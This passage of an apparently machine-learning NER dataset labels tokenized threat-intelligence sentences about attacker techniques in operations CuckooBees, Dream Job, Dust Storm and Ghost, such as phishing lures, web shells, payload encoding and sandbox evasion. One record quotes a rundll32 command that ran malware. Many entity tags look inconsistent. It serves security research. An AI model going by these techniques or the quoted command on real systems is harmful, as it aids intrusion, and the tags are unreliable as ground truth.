"and", "wrote", "the", "decoded", "output", "to", "a", "text", "file." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "enabled", "HTTP", "and", "HTTPS", "listeners." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "B-Org", "O", "B-Org", "O" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "generated", "a", "web", "shell", "within", "a", "vulnerable", "Enterprise", "Resource", "Planning", "Web", "Application", "Server", "as", "a", "persistence", "mechanism." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "used", "batch", "scripts", "to", "perform", "reconnaissance." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "modified", "the", "`IKEEXT`", "and", "`PrintNotify`", "Windows", "services", "for", "persistence." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "archived", "victim's", "data", "into", "a", "RAR", "file." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "performed", "brute", "force", "attacks", "against", "administrator", "accounts." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "B-Org", "I-OffAct", "I-OffAct", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "digitally", "signed", "their", "own", "malware", "to", "evade", "detection." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "digitally", "signed", "their", "malware", "and", "the", "dbxcli", "utility." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "used", "code", "signing", "certificates", "issued", "by", "Sectigo", "RSA", "for", "some", "of", "its", "malware", "and", "tools." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "used", "malicious", "Trojans", "and", "DLL", "files", "to", "exfiltrate", "data", "from", "an", "infected", "host." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "B-Way", "B-Tool", "O", "B-Way", "B-Tool", "O", "B-SamFile", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "used", "tools", "that", "used", "the", "`IsDebuggerPresent`", "call", "to", "detect", "debuggers." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "queried", "compromised", "victim's", "active", "directory", "servers", "to", "obtain", "the", "list", "of", "employees", "including", "administrator", "accounts." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "registered", "a", "domain", "name", "identical", "to", "that", "of", "a", "compromised", "company", "as", "part", "of", "their", "BEC", "effort." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "Operation", "Dream", "Job,", "Lazarus", "Group", "compromised", "domains", "in", "Italy", "and", "other", "countries", "for", "their", "C2", "infrastructure." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Area", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "created", "fake", "email", "accounts", "to", "correspond", "with", "fake", "LinkedIn", "personas;", "Lazarus", "Group", "also", "established", "email", "accounts", "to", "match", "those", "of", "the", "victim", "as", "part", "of", "their", "BEC", "attempt." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "encrypted", "malware", "such", "as", "DRATzarus", "with", "XOR", "and", "DLL", "files", "with", "base64." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "exfiltrated", "data", "from", "a", "compromised", "host", "to", "actor-controlled", "C2", "servers." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "used", "a", "custom", "build", "of", "open-source", "command-line", "dbxcli", "to", "exfiltrate", "stolen", "data", "to", "Dropbox." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "I-Purp", "I-Purp", "O", "B-Way" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "removed", "all", "previously", "delivered", "files", "from", "a", "compromised", "computer." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "conducted", "word", "searches", "within", "documents", "on", "a", "compromised", "host", "in", "search", "of", "security", "and", "financial", "matters." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O" ] }, { "tokens": [ "For", "Operation", "Dream", "Job,", "Lazarus", "Group", "conducted", "extensive", "reconnaissance", "research", "on", "potential", "targets." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "Operation", "Dream", "Job,", "Lazarus", "Group", "gathered", "victim", "organization", "information", "to", "identify", "specific", "targets." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "targeted", "Windows", "servers", "running", "Internet", "Information", "Systems", "(IIS)", "to", "install", "C2", "components." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "targeted", "specific", "individuals", "within", "an", "organization", "with", "tailored", "job", "vacancy", "announcements." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "I-Org", "I-Org", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "impersonated", "HR", "hiring", "personnel", "through", "LinkedIn", "messages", "and", "conducted", "interviews", "with", "victims", "in", "order", "to", "deceive", "them", "into", "downloading", "malware." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "I-Org", "I-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "downloaded", "multistage", "malware", "and", "tools", "onto", "a", "compromised", "host." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "conducted", "internal", "spearphishing", "from", "within", "a", "compromised", "organization." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "lured", "victims", "into", "executing", "malicious", "documents", "that", "contained", "\"dream", "job\"", "descriptions", "from", "defense,", "aerospace,", "and", "other", "sectors." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "B-Idus", "O", "O", "B-Idus" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "lured", "users", "into", "executing", "a", "malicious", "link", "to", "disclose", "private", "account", "information", "or", "provide", "initial", "access." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "Operation", "Dream", "Job,", "Lazarus", "Group", "developed", "custom", "tools", "such", "as", "Sumarta,", "DBLL", "Dropper,", "Torisma,", "and", "DRATzarus", "for", "their", "operations." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Tool", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "disguised", "malicious", "template", "files", "as", "JPEG", "files", "to", "avoid", "detection." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "used", "Windows", "API", "`ObtainUserAgentString`", "to", "obtain", "the", "victim's", "User-Agent", "and", "used", "the", "value", "to", "connect", "to", "their", "C2", "server." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "used", "PowerShell", "commands", "to", "explore", "the", "environment", "of", "compromised", "victims." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "placed", "LNK", "files", "into", "the", "victims'", "startup", "folder", "for", "persistence." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "used", "`regsvr32`", "to", "execute", "malware." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "executed", "malware", "with", "`C:\\\\windows\\system32\\rundll32.exe", "\"C:\\ProgramData\\ThumbNail\\thumbnail.db\"`,", "`CtrlPanel", "S-6-81-3811-75432205-060098-6872", "0", "0", "905`." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "created", "scheduled", "tasks", "to", "set", "a", "periodic", "execution", "of", "a", "remote", "XSL", "script." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "acquired", "servers", "to", "host", "their", "malicious", "tools." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "Operation", "Dream", "Job,", "Lazarus", "Group", "compromised", "servers", "to", "host", "their", "malicious", "tools." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Purp", "O", "O", "O" ] }, { "tokens": [ "For", "Operation", "Dream", "Job,", "Lazarus", "Group", "used", "LinkedIn", "to", "identify", "and", "target", "employees", "within", "a", "chosen", "organization." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "B-Org", "O", "O", "O", "O" ] }, { "tokens": [ "For", "Operation", "Dream", "Job,", "Lazarus", "Group", "created", "fake", "LinkedIn", "accounts", "for", "their", "targeting", "efforts." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "packed", "malicious", ".db", "files", "with", "Themida", "to", "evade", "detection." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "sent", "emails", "with", "malicious", "attachments", "to", "gain", "unauthorized", "access", "to", "targets'", "computers." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "sent", "malicious", "OneDrive", "links", "with", "fictitious", "job", "offer", "advertisements", "via", "email." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "sent", "victims", "spearphishing", "messages", "via", "LinkedIn", "concerning", "fictitious", "jobs." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "used", "an", "AES", "key", "to", "communicate", "with", "their", "C2", "server." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "used", "tools", "that", "conducted", "a", "variety", "of", "system", "checks", "to", "detect", "sandboxes", "or", "VMware", "services." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "B-Tool", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "deployed", "malware", "designed", "not", "to", "run", "on", "computers", "set", "to", "Korean,", "Japanese,", "or", "Chinese", "in", "Windows", "language", "preferences." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Area", "B-Area", "O", "B-Area", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "used", "DOCX", "files", "to", "retrieve", "a", "malicious", "document", "template/DOTM", "file." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "used", "tools", "that", "collected", "`GetTickCount`", "and", "`GetSystemTimeAsFileTime`", "data", "to", "detect", "sandbox", "or", "VMware", "services." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "Operation", "Dream", "Job,", "Lazarus", "Group", "obtained", "tools", "such", "as", "Wake-On-Lan,", "Responder,", "ChromePass,", "and", "dbxcli." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "For", "Operation", "Dream", "Job,", "Lazarus", "Group", "used", "compromised", "servers", "to", "host", "malware." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "For", "Operation", "Dream", "Job,", "Lazarus", "Group", "used", "multiple", "servers", "to", "host", "malicious", "tools." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "executed", "a", "VBA", "written", "malicious", "macro", "after", "victims", "download", "malicious", "DOTM", "files;", "Lazarus", "Group", "also", "used", "Visual", "Basic", "macro", "code", "to", "extract", "a", "double", "Base64", "encoded", "DLL", "implant." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "B-Tool", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "uses", "HTTP", "and", "HTTPS", "to", "contact", "actor-controlled", "C2", "servers." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "used", "file", "hosting", "services", "like", "DropBox", "and", "OneDrive." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "I-Tool", "I-Tool", "I-Tool", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "launched", "malicious", "DLL", "files,", "created", "new", "folders,", "and", "renamed", "folders", "with", "the", "use", "of", "the", "Windows", "command", "shell." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "used", "WMIC", "to", "executed", "a", "remote", "XSL", "script." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dream", "Job,", "Lazarus", "Group", "used", "a", "remote", "XSL", "script", "to", "download", "a", "Base64-encoded", "DLL", "custom", "downloader." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "B-Tool", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dust", "Storm,", "attackers", "used", "VBS", "code", "to", "decode", "payloads." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "B-HackOrg", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "For", "Operation", "Dust", "Storm,", "the", "threat", "actors", "established", "domains", "as", "part", "of", "their", "operational", "infrastructure." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dust", "Storm,", "the", "threat", "actors", "used", "a", "watering", "hole", "attack", "on", "a", "popular", "software", "reseller", "to", "exploit", "the", "then-zero-day", "Internet", "Explorer", "vulnerability", "CVE-2014-0322." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O", "O", "B-Org", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "I-Exp", "I-Exp", "I-Exp", "B-Features" ] }, { "tokens": [ "For", "Operation", "Dust", "Storm,", "the", "threat", "actors", "used", "dynamic", "DNS", "domains", "from", "a", "variety", "of", "free", "providers,", "including", "No-IP,", "Oray,", "and", "3322." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "B-Idus", "O", "B-Idus" ] }, { "tokens": [ "For", "Operation", "Dust", "Storm,", "the", "threat", "actors", "established", "email", "addresses", "to", "register", "domains", "for", "their", "operations." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dust", "Storm,", "the", "threat", "actors", "encoded", "some", "payloads", "with", "a", "single-byte", "XOR,", "both", "skipping", "the", "key", "itself", "and", "zeroing", "in", "an", "attempt", "to", "avoid", "exposing", "the", "key;", "other", "payloads", "were", "Base64-encoded." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "During", "Operation", "Dust", "Storm,", "the", "threat", "actors", "exploited", "Adobe", "Flash", "vulnerability", "CVE-2011-0611,", "Microsoft", "Windows", "Help", "vulnerability", "CVE-2010-1885,", "and", "several", "Internet", "Explorer", "vulnerabilities,", "including", "CVE-2011-1255,", "CVE-2012-1889,", "and", "CVE-2014-0322." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O", "I-Exp", "I-Exp", "I-Exp", "B-Features", "O", "O", "O", "O", "B-Features", "O", "O", "I-Tool", "I-Tool", "O", "O", "B-Features", "B-Features", "O", "B-Features" ] }, { "tokens": [ "During", "Operation", "Dust", "Storm,", "the", "threat", "actors", "used", "JavaScript", "code." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "During", "Operation", "Dust", "Storm,", "the", "threat", "actors", "relied", "on", "potential", "victims", "to", "open", "a", "malicious", "Microsoft", "Word", "document", "sent", "via", "email." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "I-SamFile", "I-SamFile", "O", "O", "B-Way" ] }, { "tokens": [ "During", "Operation", "Dust", "Storm,", "the", "threat", "actors", "relied", "on", "a", "victim", "clicking", "on", "a", "malicious", "link", "sent", "via", "email." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "For", "Operation", "Dust", "Storm,", "the", "threat", "actors", "disguised", "some", "executables", "as", "JPG", "files." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dust", "Storm,", "the", "threat", "actors", "executed", "JavaScript", "code", "via", "`mshta.exe`." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "During", "Operation", "Dust", "Storm,", "the", "threat", "actors", "deployed", "a", "file", "called", "`DeployJava.js`", "to", "fingerprint", "installed", "software", "on", "a", "victim", "system", "prior", "to", "exploit", "delivery." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "Operation", "Dust", "Storm,", "the", "threat", "actors", "used", "UPX", "to", "pack", "some", "payloads." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dust", "Storm,", "the", "threat", "actors", "sent", "spearphishing", "emails", "that", "contained", "a", "malicious", "Microsoft", "Word", "document." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "O", "I-HackOrg", "I-HackOrg", "O", "B-Way", "I-Way", "O", "O", "O", "B-SamFile", "I-SamFile", "I-SamFile", "O" ] }, { "tokens": [ "During", "Operation", "Dust", "Storm,", "the", "threat", "actors", "sent", "spearphishing", "emails", "containing", "a", "malicious", "link." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "O", "I-HackOrg", "I-HackOrg", "O", "B-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Dust", "Storm,", "the", "threat", "actors", "used", "Visual", "Basic", "scripts." ], "ner_tags": [ "O", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "For", "Operation", "Ghost,", "APT29", "used", "social", "media", "platforms", "to", "hide", "communications", "to", "C2", "servers." ], "ner_tags": [ "O", "I-OffAct", "O", "B-Idus", "O", "B-Tool", "B-Idus", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "Operation", "Ghost,", "APT29", "used", "stolen", "administrator", "credentials", "for", "lateral", "movement", "on", "compromised", "networks." ], "ner_tags": [ "O", "I-OffAct", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "Operation", "Ghost,", "APT29", "registered", "domains", "for", "use", "in", "C2", "including", "some", "crafted", "to", "appear", "as", "existing", "legitimate", "domains." ], "ner_tags": [ "O", "I-OffAct", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "Operation", "Ghost,", "APT29", "used", "new", "strains", "of", "malware", "including", "FatDuke,", "MiniDuke,", "RegDuke,", "and", "PolyglotDuke." ], "ner_tags": [ "O", "I-OffAct", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "For", "Operation", "Ghost,", "APT29", "registered", "Twitter", "accounts", "to", "host", "C2", "nodes." ], "ner_tags": [ "O", "I-OffAct", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Ghost,", "APT29", "used", "steganography", "to", "hide", "payloads", "inside", "valid", "images." ], "ner_tags": [ "O", "I-OffAct", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Ghost,", "APT29", "used", "steganography", "to", "hide", "the", "communications", "between", "the", "implants", "and", "their", "C&C", "servers." ], "ner_tags": [ "O", "I-OffAct", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Ghost,", "APT29", "used", "WMI", "event", "subscriptions", "to", "establish", "persistence", "for", "malware." ], "ner_tags": [ "O", "I-OffAct", "O", "B-Idus", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", 